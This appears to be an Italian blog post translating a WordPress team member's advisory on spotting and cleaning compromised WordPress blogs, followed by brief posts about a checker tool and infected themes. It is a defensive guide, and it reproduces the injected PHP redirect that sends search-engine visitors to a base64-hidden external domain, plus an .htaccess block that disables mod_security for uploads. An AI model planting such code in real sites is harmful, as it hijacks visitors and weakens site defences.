Ricorderete senza dubbio le ultime settimane tutto quel rumore su vari blog con wordpress compromessi? Ricordate come a tutti è stato suggerito di aggiornare al più presto all’ultima release (2.5.1). Avete aggiornato vero? No? Allora è inevitabile che siate state compromessi, è solo questione di tempo.

Sfortunatamente per qualcuno che ha aggiornato è stato comunque troppo tardi. Gli Hacker possono essere venuti a conoscenza della vulnerabilità prima del team di sviluppo di WordPress, infettando i blog, rubando password e username, inserendo script e backdoor per poter tornare sul vostro blog con calma.

Questo è il sistema che hanno usato anche contro chi è stato diligente e ha aggiornato per tempo (in pratica avete aggiornato un blog già compromesso e non ve ne eravate accorti n.d.t.). I cattivi ragazzi sono arrivati prima di voi.

Nell’ultima settimana gli hackers si sono rimessi al lavoro.Al momento non esiste un exploit zero-day per wordpress. Non c’è alcuna evidenza che la versione 2.5.1 di WordPress sia vulnerabile ad exploit. Stanno utilizzando ancora i vecchi exploits.

Questa volta stanno indirizzando visite da google al tuo blog. Quelle visite invece vengono reindirizzata a your-needs.info e anyresult.net.

Se il tuo blog è stato compromesso:

1. Aggiorna all’ultima versione di WordPress
2. Assicurati che non ci siano backdoors o codice malevolo nel tuo sistema. Vengono lasciati in forma di script nei vostri files e anche nal vostro tema, quindi controllate per bene anche il vostro tema.
3. Cambiate la password e verificate con attenzione che l’hacker abbia creato un altro user, e se lo trovate eliminatelo.(il nuovo user non l’hacker )

Codice nascosto

I cattivi ragazzi utilizzano diversi sistemi per nacondere i loro hack:

Il sistema più semplice è quello di nascondere il codice nei vostri file php. Se la directory del blog e i vostri file sono scrivibili dal server allora un hacker ha la massima libertà d’azione per seminare il suo codice dove vuole. wp-blog-header.php sembra essere uno dei file preferiti. I file del tema sono un altro posto molto appetitoso. Quando aggiorni wordpress i file del dema non vengono sovrascritti così verifica con attenzione i file del tuo tema e cerca strani codici che usano il comando  eval() o base64_decode().

Ecco un esempio di codice preso da qui:

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

Un altro hack aggiunge codice differente. Cerca nei tuoi file k1b0rg o keymachine.de e se lo trovi eliminalo.

Controlla il file .htacces nella directory principale del tuo blog.

Se non è mai stato modificato dovrebbe apparirti così:

# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress

Potreste trovare anche quest’altro pezzo di codice che è riferito all’uploader:

<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule>

Un altro sistema che utilizzano questi cattivi ragazzi è quello di caricare sul vostro server nella directory uploads dei file mascherati da jpeg aggiungendoli alla lista dei plugin attivi. Questo rende più difficile scovarli ma non impossibile.

• Aprite PHPMyAdmin e andate nella tabella wp-option del vostro blog e cercate il record active_plugins.
• Modificate quel record. E’ un record molto lungo. Scorrete il record e cercate una stringa tipo: “../uploads/2008/05/04/jhjyahjhnjnva.jpg”. Eliminate quel testo e assicuratevi di eliminare l’informazione di array serializzato  per quel record di array. Se la procedura è troppo complessa, cancellate il record active_plugin e riattivate di nuovo tutti i plugin.
• Cercate nella vostra directory di upload quel file e cancellatelo.
• Questo video su YouTube vi mostra i passi da seguire. Non è necessario e neppure urgente cancellare il record rss_*, ma se lo fate non create danni.

Cambia le password

Una volta aggiornato e verificato che tutto sia pulito DEVI:

1. Cambiare le password di tutti i tuoi utenti
2. Assicurarti che l’hacker non abia creato un’altro utente per potersi collegare nuovamente.

Ferma i cattivi ragazzi:

Fate regolari backup dei file e del database.

Per questa parte vi lascio all’articolo originale e alla traduzione di aldolat perchè nella stragrande maggioranza dei casi non gestite da voi il vostro server.

Per favore aggiornate

Non esiste alcun motivo valido per non aggiornare. WordPress è famoso per la sua installazione in 5 minuti, ma richiede tempo e fatica per la sua manutenzione.Se non vuoi fare la fatica per aggiornarlo o non sai come fare la manutenzione, perchè non prendere un blog hostato da  WordPress.com? Davvero i $10 che guadagnate mensilmente dalla pubblicità  giustifica il tempo che impiegate per rendere sicuro il vosto blog, quello che scrivete, le vostro foto e i vostri media? Questa non è pubblicità per WordPress.com, scegliete pure il servizio di blogging che preferita, ma non fate che l’immondizia che c’è in giro abbia vita semplice nel prendere il controllo del vostro software non aggiornato per usarlo per il loro vantaggio.

Aiuta un amico

Controlla il codice sorgente del blog che stai leggendo. Il numero di versione di wordpress che trovate velocemente nel header vi dirà se wordpress è aggiornato o no.

Per favore lasciategli un un commento invitandolo ad aggiornare.

Il numero di verisone vi apparirà così:

<meta name=”generator” content=”WordPress 2.5.1? /> <!– leave this for stats ->

Se volete leggere l’articolo originale questo è il link.

Questa invece è la traduzione in italiano completa.

(libera traduzione autorizzata del post di Donncha, uno dei membri del team di wordpress)

ovvero: come scoprire se il vostro blog WordPress è stato compromesso.

Qualche mese fa abbiamo segnalato il fatto che ci sono in giro dei temi di WordPress infettati da codice malevolo.
Bene, ora tramite un post sul blog di Suzukimaruti, apprendiamo dell’esistenza di WordPress autotest un utile strumento online per verificare se il codice del proprio blog è infettato il blog è stato compromesso, anche senza l’uso di temi infetti.
Il tool è in italiano ed è stato realizzato da Mario Pascucci che si occupa di sicurezza e nel suo blog dedica anche una interessante sezione all’argomento.

Edit del 12/6: grazie alla precisazione di Mario che nei commenti ci ha specificato che il suo tool serve a verificare se il proprio blog è stato compromesso e non, come da me riportato, a controllare se si sta usando un template infetto.
Mi scuso con lui per la confusione, che è nata da alcune segnalazioni nel forum di alcuni utenti che si erano ritrovati del codice malevolo nei temi che avevano installato sul proprio blog.
A questo punto il titolo del post dovrebbe cambiare di conseguenza, ma l’unica ragione per cui lo lascio è che ormai è stato indicizzato da altri siti ed eventuali utenti che volessero maggiori info al riguardo, rischierebbero di non trovare più il post.
MrBrown.

Un post apparso sul nostro forum, ha dato spunto a questo articolo perchè il fenomeno che andremo a descrivere è in aumento. Parliamo di temi wordpress originali o pubblicati su gallery che presentano al loro interno del codice “malizioso”, inserito dall’autore del tema o più spesso dai gestori della gallery. Leggi il resto »